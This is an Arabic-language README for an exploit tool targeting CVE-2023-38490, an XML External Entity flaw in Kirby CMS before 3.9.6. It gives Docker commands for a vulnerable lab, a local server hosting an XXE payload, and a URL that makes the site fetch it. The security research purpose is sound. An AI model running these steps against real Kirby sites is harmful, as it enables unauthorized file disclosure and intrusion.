
كيربي < 3.9.6 استغلال الكيان الخارجي XML
كيربي < 3.9.6 ثغرة XML External Entity
أداة استغلال لـ CVE-2023-38490 / GHSA-q386-w6fg-gmgp.
بناء وتشغيل التطبيق التجريبي الضعيف:
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
تقديم الحمولة التجريبية:
ملاحظة: اختر عنوان ربط يمكن لحاوية docker الوصول إليه.
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
تشغيل الاستغلال:
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
الدالة الضعيفة موجودة في نواة كيربي ولكنها لا تُستخدم افتراضيًا في نواة كيربي أو Kirby StarterKit أو Kirby PlainKit. وهذا يعني أن الثغرة لن تؤثر عليك في التكوين الافتراضي ولكن يمكن إدخالها من خلال التطوير المخصص أو عن طريق تثبيت إضافة تستخدم هذه الأداة المتأثرة.
لا تروج ACCEIS أو تشجع أي نشاط غير قانوني، فجميع المحتويات المقدمة في هذا المستودع مخصصة لأغراض البحث والتعليم واكتشاف التهديدات فقط.